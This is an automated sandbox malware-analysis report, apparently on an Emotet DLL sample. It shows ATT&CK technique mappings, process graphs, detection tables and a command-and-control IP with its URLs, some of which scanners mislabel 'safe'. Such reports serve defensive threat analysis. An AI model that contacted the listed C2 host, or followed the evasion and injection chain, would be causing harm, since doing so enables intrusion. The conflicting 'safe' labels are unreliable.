                      Source: Yara matchFile source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection112Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerSecurity Software Discovery61SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemSystem Information Discovery34Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532438 Sample: 3pO1282Kpx Startdate: 02/12/2021 Architecture: WINDOWS Score: 96 53 Sigma detected: Emotet RunDLL32 Process Creation 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected Emotet 2->59 8 loaddll32.exe 1 2->8         started        10 svchost.exe 2->10         started        13 svchost.exe 3 8 2->13         started        15 10 other processes 2->15 process3 dnsIp4 18 rundll32.exe 2 8->18         started        21 cmd.exe 1 8->21         started        23 rundll32.exe 8->23         started        31 3 other processes 8->31 63 Changes security center settings (notifications, updates, antivirus, firewall) 10->63 25 MpCmdRun.exe 10->25         started        27 WerFault.exe 13->27         started        29 WerFault.exe 13->29         started        51 127.0.0.1 unknown unknown 15->51 signatures5 process6 signatures7 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->61 33 rundll32.exe 18->33         started        35 rundll32.exe 21->35         started        37 rundll32.exe 23->37         started        39 conhost.exe 25->39         started        41 rundll32.exe 31->41         started        process8 process9 43 rundll32.exe 33->43         started        47 rundll32.exe 35->47         started        dnsIp10 49 45.63.5.129, 443, 49804 AS-CHOOPAUS United States 43->49 65 System process connects to network (likely due to code injection or exploit) 43->65 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3pO1282Kpx.dll23%VirustotalBrowse
                      3pO1282Kpx.dll18%ReversingLabsWin32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      14.2.rundll32.exe.33d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      25.2.rundll32.exe.2960000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.700000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.33e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.6d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.14d0000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.rundll32.exe.520000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.14d0000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.14d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.2.loaddll32.exe.14d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.14d0000.9.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNb0%Avira URL Cloudsafe
                      http://crl.microsoft0%URL Reputationsafe
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNG0%Avira URL Cloudsafe
                      https://45.63.5.129/8%VirustotalBrowse
                      https://45.63.5.129/0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNOz0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNbrundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.microsoftWerFault.exe, 00000016.00000002.544098709.000000000292C000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.451257545.0000017F2F641000.00000004.00000001.sdmpfalse
                            		high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpfalse
                              		high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000003.417058867.0000017F2F63E000.00000004.00000001.sdmpfalse
                                		high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                          		high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                            		high
                                            https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNGrundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmpfalse
                                              		high
                                              https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://45.63.5.129/rundll32.exe, 00000019.00000002.763936612.0000000002B95000.00000004.00000020.sdmptrue
                                                      • 8%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000006.00000003.639867231.000001ECC66A8000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.640572872.000001ECC66AB000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.409525624.0000017F2F669000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.459029231.0000017F2F66B000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dev.virtualearth.net/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://crl.ver)svchost.exe, 00000006.00000002.640739362.000001ECCBE15000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://upx.sf.netAmcache.hve.19.drfalse
                                                                          		high
                                                                          https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNOzrundll32.exe, 00000019.00000002.763540592.0000000002B5A000.00000004.00000020.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://%s.xboxlive.comsvchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		low
                                                                            https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://dynamic.tsvchost.exe, 0000000A.00000003.417044646.0000017F2F647000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.410767896.0000017F2F64F000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.453634339.0000017F2F650000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://disneyplus.com/legal.svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000002.450562403.0000017F2F63D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.362651281.0000017F2F634000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.tiktok.com/legal/report/svchost.exe, 00000026.00000003.739051194.00000184DC780000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.452763932.0000017F2F64A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417035105.0000017F2F649000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://activity.windows.comsvchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://help.disneyplus.com.svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		low
                                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmpfalse
                                                                                                      		high

                                                                                                      Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      45.63.5.129
                                                                                                      		unknownUnited States
                                                                                                      		20473AS-CHOOPAUStrue

                                                                                                      Private

                                                                                                      IP
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                      Analysis ID:532438
                                                                                                      Start date:02.12.2021
                                                                                                      Start time:09:32:22
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 13m 7s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:light
                                                                                                      Sample file name:3pO1282Kpx (renamed file extension from none to dll)
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Number of analysed new started processes analysed:40
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal96.troj.evad.winDLL@46/21@0/2
                                                                                                      EGA Information:Failed
                                                                                                      HDC Information:
                                                                                                      • Successful, ratio: 23.4% (good quality ratio 21.9%)
                                                                                                      • Quality average: 70.2%
                                                                                                      • Quality standard deviation: 26.3%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 86%
                                                                                                      • Number of executed functions: 0
                                                                                                      • Number of non-executed functions: 0
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      • Override analysis time to 240s for rundll32
                                                                                                      Warnings:
                                                                                                      Show All
                                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 23.35.236.56, 20.189.173.22, 20.54.110.249
                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      09:33:30API Interceptor10x Sleep call for process: svchost.exe modified
                                                                                                      09:35:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                      09:36:04API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      45.63.5.129nhlHEF5IVY.dllGet hashmaliciousBrowse
                                                                                                        IGidwJjoUs.dllGet hashmaliciousBrowse
                                                                                                          efELSMI5R4.dllGet hashmaliciousBrowse

                                                                                                            Domains

                                                                                                            No context

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            AS-CHOOPAUSnhlHEF5IVY.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            IGidwJjoUs.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            efELSMI5R4.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            ImSL42AOtZ.exeGet hashmaliciousBrowse
                                                                                                            • 45.63.36.79
                                                                                                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                            • 66.42.57.149
                                                                                                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                            • 66.42.57.149
                                                                                                            iU17wh2uUd.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            iU17wh2uUd.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            Sz4lxTmH7r.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            RFIlSRQKzj.exeGet hashmaliciousBrowse
                                                                                                            • 45.32.115.235
                                                                                                            setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            MMUc2aeWxZ.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            0pvsj0MF1D.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            Linux_amd64Get hashmaliciousBrowse
                                                                                                            • 45.32.162.141
                                                                                                            nkXzJnW7AH.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196
                                                                                                            67MPsax8fd.exeGet hashmaliciousBrowse
                                                                                                            • 136.244.117.138
                                                                                                            Linux_x86Get hashmaliciousBrowse
                                                                                                            • 45.77.44.252
                                                                                                            uI6mJo4TJQ.exeGet hashmaliciousBrowse
                                                                                                            • 149.28.253.196

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            51c64c77e60f3980eea90869b68c58a8nhlHEF5IVY.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            IGidwJjoUs.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            efELSMI5R4.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            fehiVK2JSx.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            kQ9HU0gKVH.exeGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            gvtdsqavfej.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            jSxIzXfwc7.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            mhOX6jll6x.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            X2XCewI2Yy.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            dguQYT8p8j.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            HMvjzUYq2h.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            s9BZBDWmi4.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129
                                                                                                            bFx5bZRC6P.dllGet hashmaliciousBrowse
                                                                                                            • 45.63.5.129

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.3593198815979092
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                            MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
